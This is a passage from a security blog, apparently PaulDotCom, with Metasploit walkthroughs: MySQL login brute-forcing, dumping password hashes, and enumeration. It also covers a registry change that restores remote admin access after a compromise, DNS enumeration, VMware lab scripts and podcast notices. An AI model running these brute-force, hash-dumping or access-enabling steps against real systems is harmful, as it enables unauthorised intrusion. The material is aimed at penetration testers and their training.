  99: [-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.

 100: [*] Getting Tokens...

 101: [*] All tokens have been processed

 102: [*] Done!

 103: msf exploit(handler) > 

As it can be seen the Framework is advancing a great number of features and new options are being added. I do have to say that the path in which the HD moved the Framework when joining forces with Rapid7 is paying off in a more robust and faster release cycle.

Recently HD added a new mixin for MySQL adding support for connecting and executing queries against MySQL using the MySQL library from tmtm.org. In addition to the library 2 new modules from Bernardo Damele (Author of SQLMap) where added. The modules from Bernardo are:

• mysql_sql – A simple module for executing queries against MySQL provided the appropriate credentials.
• mysql_login – Login brut force module.

In addition to this 2 module I wrote a mysql_enum module based on the CIS Benchmark for MySQL and an existing module called version was already present to enumerate a MySQL version thru the network.

The Mixin

Lets start by taking a look at the Mixin. At the moment of this blog post this is how the mixin looks:

  1: require 'msf/core'
  2: require 'rbmysql'
  3: 
  4: module Msf
  5: module Exploit::Remote::MYSQL
  6: 
  7: 	include Exploit::Remote::Tcp
  8: 
  9: 	def initialize(info = {})
 10: 		super
 11: 
 12: 		register_options(
 13: 			[
 14: 				Opt::RHOST,
 15: 				Opt::RPORT(3306),
 16: 				OptString.new('MYSQL_USER', [ true, 'The username to authenticate as', 'root']),
 17: 				OptString.new('MYSQL_PASS', [ false, 'The password for the specified username', '']),
 18: 			], Msf::Exploit::Remote::MYSQL
 19: 		)
 20: 	end
 21: 
 22: 	def mysql_login(user='root', pass='', db=nil)
 23: 		disconnect if self.sock
 24: 		connect
 25: 
 26: 		@mysql_handle = ::RbMysql.connect({
 27: 			:host     => rhost,
 28: 			:port     => rport,
 29: 			:socket   => sock,
 30: 			:user     => user,
 31: 			:password => pass,
 32: 			:db       => db
 33: 		})
 34: 	end
 35: 
 36: 	def mysql_logoff
 37: 		@mysql_handle = nil if @mysql_handle
 38: 		disconnect if self.sock
 39: 	end
 40: 
 41: 	def mysql_login_datastore
 42: 		mysql_login(datastore['MYSQL_USER'], datastore['MYSQL_PASS'])
 43: 	end
 44: 
 45: 	def mysql_query(sql)
 46: 		res = nil
 47: 		begin
 48: 			res = @mysql_handle.query(sql)
 49: 		rescue ::RbMysql::Error => e
 50: 			print_error("MySQL Error: #{e.class} #{e.to_s}")
 51: 			return
 52: 		end
 53: 
 54: 		res
 55: 	end
 56: 
 57: end
 58: end
 
 

From lines 9 to 20 the mixin when initialized adds the following options to the module that imports it:

• RHOST – The MySQL server to connect to.
• RPORT – The MySQL port, default value of 3306.
• MYSQL_USER – User account to use for the connecting to the MySQL Server.
• MYSQL_PASS – Password to use for the connecting to the MySQL Server

The Mixin is a very simple one to use it provides 4 calls:

• mysql_login – this call allows the coder to connect to a MySQL server providing the Username, Password and Database
• mysql_logoff - Disconnects the connection created to the database server created by msql_login
• mysql_login_datastore – Is a wrapper around mysql_login where a login is made using only the datastore values for MYSQL_USER and MYSQL_PASS.
• mysql_query – Performs a SQL query against the connected database server given a SQL string to execute.

The MySQL Version Scanner Module

The existing module before the mixing was added is the version scanner module by Kris Katterjohn:

   1: msf > use auxiliary/scanner/mysql/version 

   2: msf auxiliary(version) > info

   3:  

   4:        Name: MySQL Server Version Enumeration

   5:     Version: 6482

   6:     License: Metasploit Framework License (BSD)

   7:        Rank: Normal

   8:  

   9: Provided by:

  10:   kris katterjohn <katterjohn@gmail.com>

  11:  

  12: Basic options:

  13:   Name     Current Setting  Required  Description

  14:   ----     ---------------  --------  -----------

  15:   RHOSTS                    yes       The target address range or CIDR identifier

  16:   RPORT    3306             yes       The target port

  17:   THREADS  1                yes       The number of concurrent threads

  18:  

  19: Description:

  20:   Enumerates the version of MySQL servers

  21:  

  22: msf auxiliary(version) > 

the module accepts as options

• RHOSTS – a targeted address range.
• RPORT – the TCP port on where to look for, the port 3306 is set by default.
• THREADS – the number of threads to use for lloking for host and enumerating their versions, default is 1.

Lets set a scan and run it against the local network.

   1: msf auxiliary(version) > set RHOSTS 192.168.1.1/24

   2: RHOSTS => 192.168.1.1/24

   3: msf auxiliary(version) > set THREADS 10

   4: THREADS => 10

   5: msf auxiliary(version) > run

   6:  

   7: [*] Scanned 029 of 256 hosts (011% complete)

   8: [*] Scanned 052 of 256 hosts (020% complete)

   9: [*] Scanned 077 of 256 hosts (030% complete)

  10: [*] Scanned 103 of 256 hosts (040% complete)

  11: [*] Scanned 128 of 256 hosts (050% complete)

  12: [*] Scanned 154 of 256 hosts (060% complete)

  13: [*] Scanned 189 of 256 hosts (073% complete)

  14: [*] Scanned 205 of 256 hosts (080% complete)

  15: [*] 192.168.1.225:3306 is running MySQL ["5.0.75-0ubuntu10.2"] (protocol [10])

  16: [*] Scanned 232 of 256 hosts (090% complete)

  17: [*] Scanned 256 of 256 hosts (100% complete)

  18: [*] Auxiliary module execution completed

  19: msf auxiliary(version) > 

It found our MySQL box and enumerated correctly the version.

The MySQL Login Bruteforce Module

The MySQL Login Bruteforce module by Bernardo is one of the first modules to use the new mixin:

   1: msf > use auxiliary/scanner/mysql/mysql_login 

   2:  

   3: msf auxiliary(mysql_login) > info

   4:  

   5:        Name: MySQL Login Utility

   6:     Version: 7979

   7:     License: Metasploit Framework License (BSD)

   8:        Rank: Normal

   9:  

  10: Provided by:

  11:   Bernardo Damele A. G. <bernardo.damele@gmail.com>

  12:  

  13: Basic options:

  14:   Name             Current Setting  Required  Description

  15:   ----             ---------------  --------  -----------

  16:   MYSQL_PASS                        no        The password for the specified username

  17:   MYSQL_PASS_FILE                   no        A dictionary of passwords to perform a bruteforce attempt

  18:   MYSQL_USER       root             yes       The username to authenticate as

  19:   RHOSTS                            yes       The target address range or CIDR identifier

  20:   RPORT            3306             yes       The target port

  21:   THREADS          1                yes       The number of concurrent threads

  22:   VERBOSE          false            yes       Verbose output

  23:  

  24: Description:

  25:   This module simply queries the MySQL instance for a specific 

  26:   user/pass (default is root with blank).

  27:  

  28: msf auxiliary(mysql_login) > 

The module adds 3 options additional to the options that are part of the mixin, this options are:

• MYSQL_PASS_FILE – A Dictionary of password to perform the bruteforce.
• THREADS – The Number of simultaneous attempts to perform.
• VERBOSE – Enable verbose mode so as to see as much information of what the module is doing.
• RHOSTS – The range of servers to test.

Once successful this module also saves the found credentials in the database attached to the framework if one is present. Lets set the module to attack the found MySQL server, give it a password file and set it to 10 concurrent connections:

   1: msf auxiliary(mysql_login) > set MYSQL_PASS_FILE /tmp/pass.txt

   2: MYSQL_PASS_FILE => /tmp/pass.txt

   3: msf auxiliary(mysql_login) > set THREADS 5

   4: THREADS => 5

   5: msf auxiliary(mysql_login) > set RHOSTS 192.168.1.225

   6: RHOSTS => 192.168.1.225

   7: msf auxiliary(mysql_login) > run

   8:  

   9: [*] 192.168.1.225:3306 successful logged in as 'root' with password 'P@ssword'

  10: [*] Scanned 1 of 1 hosts (100% complete)

  11: [*] Auxiliary module execution completed

  12: msf auxiliary(mysql_login) > 

The new mixin is quite fast.

The MySQL Generic Query Module

This is the second module contributed by Bernardo, it allows the execution of generic SQL queries given a username and password.

   1: msf auxiliary(mysql_login) > use auxiliary/admin/mysql/mysql_sql 

   2: msf auxiliary(mysql_sql) > info

   3:  

   4:        Name: MySQL SQL Generic Query

   5:     Version: 7978

   6:     License: Metasploit Framework License (BSD)

   7:        Rank: Normal

   8:  

   9: Provided by:

  10:   Bernardo Damele A. G. <bernardo.damele@gmail.com>

  11:  

  12: Basic options:

  13:   Name        Current Setting   Required  Description

  14:   ----        ---------------   --------  -----------

  15:   MYSQL_PASS                    no        The password for the specified username

  16:   MYSQL_USER  root              yes       The username to authenticate as

  17:   RHOST                         yes       The target address

  18:   RPORT       3306              yes       The target port

  19:   SQL         select version()  yes       The SQL to execute.

  20:  

  21: Description:

  22:   This module allows for simple SQL statements to be executed against 

  23:   a MySQL instance given the appropriate credentials.

  24:  

  25: msf auxiliary(mysql_sql) > 

Lets set the module to execute the “select user, host, password from mysql.user” query to list all accounts configured on the server, the host from which they can connect to and the password hash (in version 5 a double SHA1):

   1: msf auxiliary(mysql_sql) > set MYSQL_PASS P@ssword

   2: MYSQL_PASS => P@ssword

   3: msf auxiliary(mysql_sql) > set RHOST 192.168.1.225

   4: RHOST => 192.168.1.225

   5: msf auxiliary(mysql_sql) > set SQL select user, host, password from mysql.user

   6: SQL => select user, host, password from mysql.user

   7: msf auxiliary(mysql_sql) > run

   8:  

   9: [*] Sending statement: 'select user, host, password from mysql.user'...

  10: [*]  | root | localhost | *1114CDA5E6E3C382919BCF0D858DD97EB8254812 |

  11: [*]  | root | mysql1 | *1114CDA5E6E3C382919BCF0D858DD97EB8254812 |

  12: [*]  | root | 127.0.0.1 | *1114CDA5E6E3C382919BCF0D858DD97EB8254812 |

  13: [*]  | debian-sys-maint | localhost | *B5B29092C4F54539DAEED066DDA875543A81C9A8 |

  14: [*]  | root | % | *1114CDA5E6E3C382919BCF0D858DD97EB8254812 |

  15: [*]  | empypassusr | % |  |

  16: [*]  |  | % | *26084ECEA9703C37D3D28CA34D9346D9527B0ABF |

  17: [*] Auxiliary module execution completed

  18: msf auxiliary(mysql_sql) > 

The level of access and what queries can be performed will depend on the permissions of the account that is being used.

 The MySQL Enumeration Module

Entering each query one by one will take some time, so I wrote a module that uses the mixin for performing enumeration of those parameter, privileges and accounts that might be of interest to an attacker.

   1: msf auxiliary(mysql_sql) > use auxiliary/admin/mysql/mysql_enum 

   2: msf auxiliary(mysql_enum) > info

   3:  

   4:        Name: MySQL Enumeration Module

   5:     Version: $Revision:$

   6:     License: Metasploit Framework License (BSD)

   7:        Rank: Normal

   8:  

   9: Provided by:

  10:   Carlos Perez. <carlos_perez@darkoperator.com>

  11:  

  12: Basic options:

  13:   Name        Current Setting  Required  Description

  14:   ----        ---------------  --------  -----------

  15:   MYSQL_PASS                   no        The password for the specified username

  16:   MYSQL_USER  root             yes       The username to authenticate as

  17:   RHOST                        yes       The target address

  18:   RPORT       3306             yes       The target port

  19:  

  20: Description:

  21:   This module allows for simple enumeration of MySQL Database Server 

  22:   provided proper credentials to connect remotely.

  23:  

  24: References:

  25:   https://cisecurity.org/benchmarks.html

  26:  

  27: msf auxiliary(mysql_enum) > 

   1: msf auxiliary(mysql_enum) > set RHOST 192.168.1.225

   2: RHOST => 192.168.1.225

   3: msf auxiliary(mysql_enum) > set MYSQL_PASS P@ssword

   4: MYSQL_PASS => P@ssword

   5: msf auxiliary(mysql_enum) > run

   6:  

   7: [*] Running MySQL Enumerator...

   8: [*] Enumerating Parameters

   9: [*]     MySQL Version: 5.0.75-0ubuntu10.2

  10: [*]     Compiled for the following OS: debian-linux-gnu

  11: [*]     Architecture: i486

  12: [*]     Server Hostname: mysql1

  13: [*]     Data Directory: /var/lib/mysql/

  14: [*]     Logging of queries and logins: OFF

  15: [*]     Old Password Hashing Algorithm: OFF

  16: [*]     Loading of local files: ON

  17: [*]     Logings with old Pre-4.1 Passwords: OFF

  18: [*]     Allow Use of symlinks for Databse Files: YES

  19: [*]     Allow Table Merge: YES

  20: [*]     SSL Connection: DISABLED

  21: [*] Enumerating Accounts:

  22: [*]     List of Accounts with Password Hashes:

  23: [*]         User: root Host: localhost Password Hash: *1114CDA5E6E3C382919BCF0D858DD97EB8254812

  24: [*]         User: root Host: mysql1 Password Hash: *1114CDA5E6E3C382919BCF0D858DD97EB8254812

  25: [*]         User: root Host: 127.0.0.1 Password Hash: *1114CDA5E6E3C382919BCF0D858DD97EB8254812

  26: [*]         User: debian-sys-maint Host: localhost Password Hash: *B5B29092C4F54539DAEED066DDA875543A81C9A8

  27: [*]         User: root Host: % Password Hash: *1114CDA5E6E3C382919BCF0D858DD97EB8254812

  28: [*]         User: empypassusr Host: % Password Hash: 

  29: [*]         User:  Host: % Password Hash: *26084ECEA9703C37D3D28CA34D9346D9527B0ABF

  30: [*]     The following users have GRANT Privilege:

  31: [*]         User: root Host: localhost

  32: [*]         User: root Host: mysql1

  33: [*]         User: root Host: 127.0.0.1

  34: [*]         User: debian-sys-maint Host: localhost

  35: [*]     The following users have CREATE USER Privilege:

  36: [*]         User: root Host: localhost

  37: [*]         User: root Host: mysql1

  38: [*]         User: root Host: 127.0.0.1

  39: [*]     The following users have RELOAD Privilege:

  40: [*]         User: root Host: localhost

  41: [*]         User: root Host: mysql1

  42: [*]         User: root Host: 127.0.0.1

  43: [*]         User: debian-sys-maint Host: localhost

  44: [*]     The following users have SHUTDOWN Privilege:

  45: [*]         User: root Host: localhost

  46: [*]         User: root Host: mysql1

  47: [*]         User: root Host: 127.0.0.1

  48: [*]         User: debian-sys-maint Host: localhost

  49: [*]     The following users have SUPER Privilege:

  50: [*]         User: root Host: localhost

  51: [*]         User: root Host: mysql1

  52: [*]         User: root Host: 127.0.0.1

  53: [*]         User: debian-sys-maint Host: localhost

  54: [*]     The following users have FILE Privilege:

  55: [*]         User: root Host: localhost

  56: [*]         User: root Host: mysql1

  57: [*]         User: root Host: 127.0.0.1

  58: [*]         User: debian-sys-maint Host: localhost

  59: [*]     The following users have POCESS Privilege:

  60: [*]         User: root Host: localhost

  61: [*]         User: root Host: mysql1

  62: [*]         User: root Host: 127.0.0.1

  63: [*]         User: debian-sys-maint Host: localhost

  64: [*]     The following accounts have privileges to the mysql databse:

  65: [*]         User: root Host: localhost

  66: [*]         User: root Host: mysql1

  67: [*]         User: root Host: 127.0.0.1

  68: [*]         User: debian-sys-maint Host: localhost

  69: [*]     Anonymous Accounts are Present:

  70: [*]         User:  Host: %

  71: [*]     The following accounts have empty passwords:

  72: [*]         User: empypassusr Host: %

  73: [*]     The following accounts are not restricted by source:

  74: [*]         User:  Host: %

  75: [*]         User: empypassusr Host: %

  76: [*]         User: root Host: %

  77: [*] Auxiliary module execution completed

  78: msf auxiliary(mysql_enum) > 

As it can be seen a lot of valuable information is gathered and displayed by the module.

As it can be seen the Framework now provides a new way to attack and enumerate MySQL Servers adding to its flexibility.

PaulDotCom is very excited to bring you several new webcast series starting next January. The webcasts will be produced, hosted, and performed by the members of PaulDotCom. In addition to the White Hat World webcasts, there will be several different topic-based webcasts that will highlight different areas of information security. The first two are sure to be a "smash hit" as we show you how to improve your skills in the areas of client-side penetration testing and web application assessments (and even avenge the death of your master). Information about each webcast, including the registration links, is below:

Title: Practical Client-Side Exploitation Kung Fu

Description: In this webcast we will explore the tools & techniques needed to perform successful client-side exploitation. Practical methods for information gathering, target selection, and exploit delivery will be covered.

Date: Thursday, January 21, 2010

Time: 2:00 PM - 3:00 PM EST

Sponsor: Core Security Technologies

Register Here: https://www1.gotomeeting.com/register/171250512

Title: Practical Web Application Pen Testing Kung Fu

Description: In this session John & Paul will guide you to performing more successful web application penetration testing. You will learn how to balance automated tools with manual testing, strike vulnerabilities with the highest chance of exploitation, and more!

Date: Tuesday, January 26, 2010

Time: 2:00 PM - 3:00 PM EST

Sponsor: Cenzic

Register Here: https://www1.gotomeeting.com/register/290940024

One of the best ways to learn is to practice and practice and I do have to say that VMWare has played a very large role in my professional life since it allows me  to test ideas, code, validate and practice against different versions of an OS, different patch levels and even different OS’s with out having to have a very large number of servers and routers to simulate environments. My current lab system is a PC running Windows 7 Enterprise with 8GB of RAM, 2 1TB 7200 SATA HD and a Intel Quad 8300, all of this running VMware Workstation 7. I have a collection of VM’s that I clone as needed, my collection of VM’s for cloning are:

1. (5) Windows 2008 Ent RTM 32bit
2. (1) Windows 2008 Ent Core RTM 32bit
3. (2) Windows Vista RTM 32bit
4. (2) Windows 7 RTM 32bit
5. (1) Windows XP SP2 32bit
6. (1) Windows XP SP3 32Bit
7. (1) Windows 2003 Ent SP2 32bit
8. (1) Windows 2003 Ent SP1 32bit
9. (1) Windows 2003 Ent R2 32bit
10. (1) Windows 2000 Advanced SP3 32bit
11. (1) Windows 2000 Advanced SP4 32bit
12. (1) Pfsense 1.2.3 Appliance
13. (1) BT4
14. (1) Ubuntu 9.10 32bit

For Database testing I have the following VM’s:

1. (1) MS SQL 2005 running on Windows 2003 32bit
2. (1) MS SQL 2008 Running on Windows 2003 Ent 32bit
3. (1) Oracle 9i Running on Windows 2003 Advanced 32bit
4. (1) Oracle 10g Running on Windows 2003 Ent 32bit
5. (1) Oracle 11g Running on Windows 2003 Ent 32bit

As it can be seen since most of my work is done with Meterpreter and post exploitation in Windows Systems the majority of my VM’s are Windows. As you can see I do have a lot of VM’s and to make matters a bit more complex when I’m testing something I use VMware Workstation feature of Teams where I create a complete isolated network of machines, this lets me test the machines behind a virtual firewall to see how well my code will work behind several configurations of firewalls and a very good feature of teams is that I can control the speed of a virtual network so I can test how will my attack or code will behave if the client has a 64kbps connection, a T-1 and many other types of speed, this really helps me tune and see how multithreading and moving large files behave thru this connections.

The team where I clone any of the VM’s you see above looks as follow:

In the configuration shown above I can play with the speed of the LAN1 network so as to simulate different environments, depending of where I want to simulate the attacker I will place the attacker machine in my home network or as a internal attacker I place an attacking  VM inside LAN2.

As it can be seen my setup can become complicated very fast and doing changes to individual machines becomes a tedious job so what better way  handle all of this VM’s that to automate it For this a simple tool that I like that can be used on Linux, OSX and Windows is the vmrun tool that is part of the VMware VIX kit, this kit is part of Fusion Full download and as a separate download for Linux. With this tool you can manage VM’s in:

1. ESX and ESXi (Remotely)
2. VMware Server (Remotely)
3. VMware Player (Remotely)
4. VMware Workstation (Locally)
5. VMware Fusion (Locally)

Some of the stuff you can do with this tool are:

1. Change state of VM’s(Start, Stop, Pause and Reset)
2. Manage Snapshots (Creation, Deletion, Revert to Snapshot)
3. Manage Processes to VM’s(List, Start and Kill)
4. Upload Files to VM’s
5. Run Scripts on VM’s

The list above is only a shot list you can check the vmrun Documentation

One of the things I tend to do is do a snapshot to all running VM’s once I have the environment setup as I want so in case I mess up something I can revert the affected VM, so for this I wrote the following batch script to create a snapshot of all running VM’s

@echo off

setlocal

set Path=C:\Program Files (x86)\VMware\VMware VIX

set snapname=

set /p snapname=Enter the name for the snapshot: 

for /F "skip=1 delims=," %%i in ('vmrun list') do (

echo Creating Snapshot for %%i and naming it %snapname%

vmrun -T ws snapshot "%%i" %snapname%

)

endlocal

set /p any=press any key ....

Here is a sample run of the script

As you can see you get prompted for the name to give to the snapshot, and we are doing a snapshot of only the running VM’s since those are the ones I’m working at the moment, I do not want to snapshot my master templates.

To revert to all running VM’s to a known snapshot the only thing I changed is the command to be revertToSnapshot

@echo off

setlocal

set Path=C:\Program Files (x86)\VMware\VMware VIX

set snapname=

set /p snapname=Enter the name for the snapshot:

for /F "skip=1 delims=," %%i in ('vmrun list') do (

echo Reverting snapshot for %%i

vmrun -T ws revertToSnapshot "%%i" %snapname% msg.autoAnswer = TRUE

vmrun start "%%i"

)

endlocal

set /p any=press any key ....

To delete I just changed the command to deleteSnapshot  as you can see it is very simple to script this tool.

@echo off

setlocal

set Path=C:\Program Files (x86)\VMware\VMware VIX

set snapname=

set /p snapname=Enter the name for the snapshot:

for /F "skip=1 delims=," %%i in ('vmrun list') do (

echo Deleting snapshot for %%i

vmrun -T ws deleteSnapshot "%%i" %snapname% msg.autoAnswer = TRUE

vmrun start "%%i"

)

endlocal

set /p any=press any key ....

In the next example I just made the batch accept a variable of file to upload to all windows running hosts by looking at their names and looking for the string“win” and only to those copy the file, I can either drag and drop the file on top of the script or when I run it and the script asks I can just drag and drop the file to the CMD windows so as to copy the path to the executable, also you will see that I provide the guest username and password so it is a good idea to have the same username and password for you lab VM’s on you machine. All VM actions that interact with the OS of the VM require that VMware Tools are installed and that credentials are given to access the underlying OS.

@echo off

set Path=C:\Program Files (x86)\VMware\VMware VIX

if "%1"=="" (set /p file=Enter path of file to upload: ) else (set file="%1")

set /p target=Enter path and filename on VMs to upload: 

for /F "delims=," %%i in ('vmrun list ^| %windir%\system32\find.exe "win"') do (

echo uploading file %file% to %%i

vmrun -T ws -gu administrator -gp Newsystem01 copyFileFromHostToGuest "%%i" "%file%" "%target%"

)

set /p any=press any key ....

Now you can use this other script to run the executable on all windows hosts, a similar one can be made for Linux if you follow a naming conversion for your VM’s.

@echo off

set /p file=Enter path and filename of program to run: 

set /p options=Enter options for program:  

for /F "skip=1 delims=," %%i in ('vmrun list ^| %windir%\system32\find.exe "win"') do (

echo uploading file %file% to %%i

vmrun -T ws -gu administrator -gp Newsystem01 runProgramInGuest "%%i" "%file%" "%options%" msg.autoAnswer = TRUE

)

set /p any=press any key ....

I just showed some simple examples on automating workstation but this can also be done with VMware Server and ESX/ESXi by just changing the type in the –T flag to server or esx depending the target and giving the address to connect to with –h for the web address and –u for the host user and –p for the host password. The tool simply executes XMLRPC calls thru SSL against the servers. I encourage that you read the rest of the short documentation on vmrun and modify and play with the scripts I here showed as examples, you can transform this same script to batch and use them in OSX or Linux if you like.

Deviant comes on the show and we talk about locking picking, bumping, and raking! Make sure you visit the show notes page for this episode to get the Powerpoint slides and videos associated with the interview:

Using OSVDB to find vulnerable software, SQL injection by example, Fake Steve jobs article enlightens the PaulDotCom crew:

Paul calls out Bruce Schneier, Ping Of Death returns, don't trust the devil on the inside, cloning fingerprints, and Paul makes the D-list! All that while smokin' cigars in the workshop:

Join us for the final podcast of the year!

We'll be celebrating live at 19:30 EST on Wednesday December 23d for Episode 181 of PaulDotCom Security Weekly!

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Paul, Carlos, Mick, Larry, John, & Darren

One of the great eye opening moments for me in the past few years was learning that we are outnumbered. Not only does it appear that there is a non-stop wave of malware and evil sites that are constantly trying to infect our systems, but it seems like our user population is working against us as well by trying to click on every evil link or evil file that they come upon. Because of this it is very easy to feel like the plight of today’s security professional is a grim one. I often say that we are in one of the only professions I know of which is destined to fail. You will have a breach and there will be compromises; you will get called out. In light of this reality I still find that information security professionals are a fairly happy lot. The trade-off for having the cards stacked against us is in that we get to work in on of the coolest fields.

If you don't think so….please get out. There are other people who would love to have your job.

However, I have also realized recently that we are not alone. There is another group of professionals that we work with every day that can help us. Our Administrator brethren are an untapped resource for the information security community. We need to start cross-training with them if we want to stand a chance against the onslaught of attacks and malware that we face on a daily basis.

There are a number of different ways to go about this. There are commercial training options for your systems administrators that are short and to the point. I will be teaching one of these classes online and another in New Orleans in January. Please see the below links for more information.

564 online.

564 in New Orleans with Mechanical Bull and Beads.

However, beyond the commercial options there is something that we should be doing as well. I recommend having weekly brown bag meetings where you can show your systems administrators some cool tricks for ideating an incident and they can show you some neat tricks for understanding the business application process flow of your organization. This tradeoff is beneficial because it illuminates both aspects of an organization, security and day-to-day administration.

Keep in mind that one of the greatest instructors of evil, the great Bastard Operator From Hell, was a Systems Administrator. There is much we can learn from them.

-strandjs

Using OSVDB to find vulnerable software, SQL injection by example, Fake Steve jobs article enlightens the PaulDotCom crew.

Warning: Contains explicit language!

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

Deviant comes on the show and we talk about locking picking, bumping, and raking! Make sure you visit the show notes page for this episode to get the Powerpoint slides and videos associated with the interview!

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

Paul calls out Bruce Schneier, Ping Of Death returns, don't trust the devil on the inside, cloning fingerprints, and Paul makes the D-list!

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

Its Larry's Birthday! Spankings ensue, radio frequencies are snooped upon for pager traffic, beer is consumed, cigars are smoked.

Special guest Ben Jackson!

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

Have you had trouble using PSEXEC or other remote administrative tools on Windows Vista, Windows 7 and WIndows 2008 servers? If so, UAC (User Access Control) might be preventing your tools from working. Windows UAC drops all the Administrator privileges from the SAT (Security Access Token) for REMOTE connections that are using LOCAL accounts. This restriction prevents all remote administrative functions such as connecting to administrative shares (C$, etc) installing services or launching a new process (psexec).

In the scenario where Computer1 belongs to the PenTesterDomain and Computer2 belongs to WORGROUP or the PentestCustomerDomain, Computer1 will not be able to connect to \\computer2\c$ or other administrative functions using the local administrator username and password on computer2. Because UAC restricts the use of administrator privileges to Interactive local sessions and to Domain accounts you will need to use a domain account.

If your using Metasploits psexec module you will need to specify the SMBDomain. This option doesn't appear when you type "show options", but it is available under the advanced options ("show advanced").

Once you've obtained some type of remote execution on the target host you can enable remote administrative functions by creating the following registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\LocalAccountTokenFilterPolicy

Create a DWORD entry at that location and set it's value to 1.

After the target machine has been rebooted you will be able to connect to the C$ share, launch PSEXEC and perform other administrative functions using the local accounts on the target system.

References:
http://forum.strataframe.net/Attachment943.aspx
http://blogs.msdn.com/vistacompatteam/archive/2006/09/22/766945.aspx

Tired of the same old security dribble? We've got some tasty dribble here at PaulDotCom, come drink it up with us as we enjoy fine beer, real security news, useful information, technical tips, and more! This week we are joined by none other than Deviant Ollam, where we will be schooled in lock picking 101 at Deviant University.

Join us live at 19:30 EST on Thursday December 17th for Episode 180 of PaulDotCom Security Weekly!

"Most Intrusion Detection Systems would detect this break-in..."

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Paul, Carlos, Mick, Larry, John, & Darren

Pauldotcom crew talks about Nessus 4.2, Point-of-Sale security woes, Dave K. dials in again, and more!

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

One of the old fashion methods of enumeration that I see time and time again give a large amount of information of great use is DNS (Domain Name Server), a large number of systems now a day depend greatly on this service to be able to operate, from IP Telephony, Windows Active Directory, Backup Systems and many other are dependent on this service. This service simplifies configuration of many services and for this same reason is one of the first areas to look at when gathering information of a target network. At the beginning this service used to be just hosts file that where shared by the system administrators of the systems connected to the internet, now a days we have a much more robust system. System administrators are required to not only know the basics but also understand this system since so much is tied to it, especially since this service easies so much the administration of large IP networks by abstraction of the addressing layer simplifying configurations, resiliency and flexibility of today's networks. There are 2 main ways I see this system configured in most of companies.

In the first configuration the client has one DNS system only for external requests and only external servers to the enterprise are registered and an internal system for Active Directory. In the second configuration the client uses the same DNS system for both internal and external use.

The first type of configuration keeps both the internal naming structure and the external naming structure separate does providing some security thru obscurity when the attacker is doing the enumeration from the outside of the network. Many times on small to medium sized companies there only have what it is called a Forward Lookup Zone, this is when you simply give a name and you get back an IP, on some you might find what it is called Wildcard Name Resolution, this is nothing more that the DNS server you are querying if it does not have a specific record for that name will return a pre-defined address, this makes enumeration thru brute force more time consuming since false positives must be cleared and check. The accuracy of the results of DNS enumeration varies a lot depending on the Name Server being queried. A target network may have different domain name spaces that they employ and prior enumeration thru metadata, email headers and other methods reveal this domain names so as to be able to enumerate and take advantage of this service. Also a UDP and TCP portscan with fingerprinting is also a very good idea so as to find any NS server that might be part of a test system or internal exposed DNS server.

For DNS enumeration I wrote Metasploit Module to aide in enumeration of targets, the module is called dns_enum. Below you will be able to see how the module can be loaded and list its options inside msfconsole:

msf > use auxiliary/gather/dns_enum 
msf auxiliary(dns_enum) > info

       Name: DNS Enumeration Module
    Version: $Rev: 7500

License: Metasploit Framework License (BSD)

ided by:
rlos Perez <carlos_perez@darkoperator.com>

c options:
me         Current Setting                                 Required  Description
--         ---------------                                 --------  -----------
MAIN                                                       yes       The target domain name
UM_AXFR    true                                            yes       Initiate a zone Transfer against each NS record
UM_BRT     false                                           yes       Brute force subdomains and hostnames via wordlist
UM_RVL     false                                           yes       Reverse lookup a range of IP addresses
UM_SRV     true                                            yes       Enumerate the most common SRV records
UM_STD     true                                            yes       Enumerate standard record types (A,MX,NS,TXT and SOA)
UM_TLD     false                                           yes       Perform a top-level domain expansion by replacing TLD and testing against IANA TLD list
RANGE                                                      no        The target address range or CIDR identifier
                                                           no        Specify the nameserver to use for queries, otherwise use the system DNS
OP_WLDCRD  false                                           yes       Stops Brute Force Enumeration if wildcard resolution is detected
RDLIST     /Users/cperez/msf3/data/wordlists/namelist.txt  no        Wordlist file for domain name brute force.

ription:
is module can be used to enumerate various types of information 
out a domain from a specific DNS server.

rences:
tp://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0532

As it can be seen in the options there are several ways one can enumerate a targeted domain, the methods are:

• Zone Transfer

• Hostname and Subdomain Dictionary Brute Force

• Reverse Lookup

• Service Record

• Standard Record Query

•Top Lever Domain Name Expansion

The module will print the results to the screen and if a database is configured in Metasploit it will save the results in the database, when using the module I highly recommend the use of MySQL or Postgres as the database to be used to save the results since this module uses multi-threading and might cause locks if using SQLite as the database, if you still choose SQLite for portability and simple management I recommend that the advanced option of THREADS to 1, this will mean a slower enumeration.

The recommended use of the module is to execute a combination of the Standard Record enumeration and the SRV enumeration so as to get a feel of all the domains found. Also testing each NS server that is found thru port scanning for the domain names found thru other methods of enumeration. The module will default to the SOA Server of the DNS name for the domain specified, to override this method and have it test against a specific DNS Name Server set the NS option value to the IP of the DNS server to test against.

